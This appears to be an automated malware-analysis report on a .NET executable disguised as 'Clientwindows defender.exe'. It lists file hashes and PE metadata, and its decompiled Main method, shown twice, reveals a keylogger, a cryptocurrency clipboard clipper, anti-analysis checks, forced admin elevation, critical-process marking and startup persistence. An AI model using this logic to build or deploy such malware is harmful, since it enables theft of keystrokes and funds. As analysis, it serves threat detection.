7016b2a3ed6de41897eca95036288441
PE Executable | MD5: 7016b2a3ed6de41897eca95036288441 | Size: 3.41 MB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 7016b2a3ed6de41897eca95036288441
|
| Sha1 | faac7623a93376a8c28d056cc71a69f66a2c5451
|
| Sha256 | 16a1317ad2b3a3464c1c97066ce8329a96b226607760393c29eb145e8c7c666c
|
| Sha384 | 74231afd0b587dff2d369972e79b1d691b7ff9ec4110458d5543144eb17d7a3951c62d1497fa8c6293e54f1814c95e8e
|
| Sha512 | 97a9c7729a562e0f37c9fb16139d4390af60f222f411b1d629ff6149be8ac5ffe70dca5a3ef39059cb67d4ca7e4baf3ac8af81c3e0de287d41e6f1a186a3df5e
|
| SSDeep | 49152:I5uBtFtNA/PVo6xHe/53z+MAzU0udBdo+6ZuDayPQr/NxJ:IGNA/e6he/qP
|
| TLSH | 0AF55B41ABE4DE1BE1BF2775A4F201011BB1E449A736D74B1798E6792C637006E0A3BF
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Clientwindows defender.exe |
| Full Name | Clientwindows defender.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Clientwindows defender.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Clientwindows defender |
| Assembly Version | 6.0.9.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 12508 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 134 |
| Main IL | ldarg.0 <null> ldlen <null> brtrue IL_0011: ldarg.0 ldstr br IL_0018: stloc.0 ldarg.0 <null> ldc.i4.0 <null> ldelem System.String stloc.0 <null> call System.Boolean Client.Helper.Methods::IsAdmin() brtrue IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() ldloc.0 <null> ldstr --flag call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() call System.Void Client.Program::ForceGetAdminAccess() br IL_004D: ldc.i4.s 26 call System.Boolean Client.Helper.MutexControl::CreateMutex() brtrue IL_004D: ldc.i4.s 26 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr 7n5rJCiEX08cdKRQsT6vxkbuaZ call System.String System.IO.Path::Combine(System.String,System.String) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldc.i4 9999 call System.Void System.Net.ServicePointManager::set_DefaultConnectionLimit(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_0093: ldloc.1 ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldc.i4.1 <null> add <null> stloc.1 <null> ldloc.1 <null> ldsfld System.String Client.Settings::De_lay call System.Int32 System.Convert::ToInt32(System.String) blt.s IL_0085: ldc.i4 1000 call System.Boolean Client.Settings::InitializeSettings() brtrue IL_00B0: call System.Void Client.Helper.SetRegistry::InitRegistry() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Client.Helper.SetRegistry::InitRegistry() ldsfld System.String Client.Settings::An_ti call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00C9: leave IL_00D4 call System.Void Client.Helper.Anti_Analysis::RunAntiAnalysis() leave IL_00D4: call System.Void Client.Helper.A::B() pop <null> leave IL_00D4: call System.Void Client.Helper.A::B() call System.Void Client.Helper.A::B() ldsfld System.String Client.Settings::Anti_Process call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00ED: leave IL_00F8 call System.Void Client.Helper.AntiProcess::StartBlock() leave IL_00F8: nop pop <null> leave IL_00F8: nop nop <null> ldsfld System.String Client.Settings::Enable_Clipper call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0169: leave IL_0174 ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr btc ldsfld System.String Client.Settings::Clipper_BTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr eth ldsfld System.String Client.Settings::Clipper_ETH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr ltc ldsfld System.String Client.Settings::Clipper_LTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr bch ldsfld System.String Client.Settings::Clipper_BCH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Threading.Thread Finder.Helpers.ClipboardManager::MainThread dup <null> ldc.i4.0 <null> callvirt System.Void System.Threading.Thread::SetApartmentState(System.Threading.ApartmentState) callvirt System.Void System.Threading.Thread::Start() leave IL_0174: nop pop <null> leave IL_0174: nop nop <null> ldsfld System.String Client.Settings::BS_OD call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0193: leave IL_019E call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_0193: leave IL_019E call System.Void Client.Helper.ProcessCritical::Set() leave IL_019E: nop pop <null> leave IL_019E: nop nop <null> ldsfld System.String Client.Settings::In_stall call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_01B3: leave IL_01BE call System.Void Client.Install.NormalStartup::Install() leave IL_01BE: call System.Void Client.Helper.Methods::PreventSleep() pop <null> leave IL_01BE: call System.Void Client.Helper.Methods::PreventSleep() call System.Void Client.Helper.Methods::PreventSleep() call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_01D2: leave IL_01DD call System.Void Client.Helper.Methods::ClearSetting() leave IL_01DD: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 pop <null> leave IL_01DD: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 dup <null> brtrue IL_01FF: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld Client.Program/<>c Client.Program/<>c::<>9 ldftn System.Void Client.Program/<>c::<Main>b__2_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.IntPtr Client.Features.KeyLog.Keylogger::SetHook() pop <null> call System.Void System.Windows.Forms.Application::Run() ret <null> |
| Module Name | Clientwindows defender.exe |
| Full Name | Clientwindows defender.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Clientwindows defender.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Clientwindows defender |
| Assembly Version | 6.0.9.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 12508 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 134 |
| Main IL | ldarg.0 <null> ldlen <null> brtrue IL_0011: ldarg.0 ldstr br IL_0018: stloc.0 ldarg.0 <null> ldc.i4.0 <null> ldelem System.String stloc.0 <null> call System.Boolean Client.Helper.Methods::IsAdmin() brtrue IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() ldloc.0 <null> ldstr --flag call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() call System.Void Client.Program::ForceGetAdminAccess() br IL_004D: ldc.i4.s 26 call System.Boolean Client.Helper.MutexControl::CreateMutex() brtrue IL_004D: ldc.i4.s 26 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr 7n5rJCiEX08cdKRQsT6vxkbuaZ call System.String System.IO.Path::Combine(System.String,System.String) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldc.i4 9999 call System.Void System.Net.ServicePointManager::set_DefaultConnectionLimit(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_0093: ldloc.1 ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldc.i4.1 <null> add <null> stloc.1 <null> ldloc.1 <null> ldsfld System.String Client.Settings::De_lay call System.Int32 System.Convert::ToInt32(System.String) blt.s IL_0085: ldc.i4 1000 call System.Boolean Client.Settings::InitializeSettings() brtrue IL_00B0: call System.Void Client.Helper.SetRegistry::InitRegistry() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Client.Helper.SetRegistry::InitRegistry() ldsfld System.String Client.Settings::An_ti call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00C9: leave IL_00D4 call System.Void Client.Helper.Anti_Analysis::RunAntiAnalysis() leave IL_00D4: call System.Void Client.Helper.A::B() pop <null> leave IL_00D4: call System.Void Client.Helper.A::B() call System.Void Client.Helper.A::B() ldsfld System.String Client.Settings::Anti_Process call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00ED: leave IL_00F8 call System.Void Client.Helper.AntiProcess::StartBlock() leave IL_00F8: nop pop <null> leave IL_00F8: nop nop <null> ldsfld System.String Client.Settings::Enable_Clipper call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0169: leave IL_0174 ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr btc ldsfld System.String Client.Settings::Clipper_BTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr eth ldsfld System.String Client.Settings::Clipper_ETH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr ltc ldsfld System.String Client.Settings::Clipper_LTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr bch ldsfld System.String Client.Settings::Clipper_BCH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Threading.Thread Finder.Helpers.ClipboardManager::MainThread dup <null> ldc.i4.0 <null> callvirt System.Void System.Threading.Thread::SetApartmentState(System.Threading.ApartmentState) callvirt System.Void System.Threading.Thread::Start() leave IL_0174: nop pop <null> leave IL_0174: nop nop <null> ldsfld System.String Client.Settings::BS_OD call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0193: leave IL_019E call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_0193: leave IL_019E call System.Void Client.Helper.ProcessCritical::Set() leave IL_019E: nop pop <null> leave IL_019E: nop nop <null> ldsfld System.String Client.Settings::In_stall call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_01B3: leave IL_01BE call System.Void Client.Install.NormalStartup::Install() leave IL_01BE: call System.Void Client.Helper.Methods::PreventSleep() pop <null> leave IL_01BE: call System.Void Client.Helper.Methods::PreventSleep() call System.Void Client.Helper.Methods::PreventSleep() call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_01D2: leave IL_01DD call System.Void Client.Helper.Methods::ClearSetting() leave IL_01DD: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 pop <null> leave IL_01DD: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 dup <null> brtrue IL_01FF: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld Client.Program/<>c Client.Program/<>c::<>9 ldftn System.Void Client.Program/<>c::<Main>b__2_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.IntPtr Client.Features.KeyLog.Keylogger::SetHook() pop <null> call System.Void System.Windows.Forms.Application::Run() ret <null> |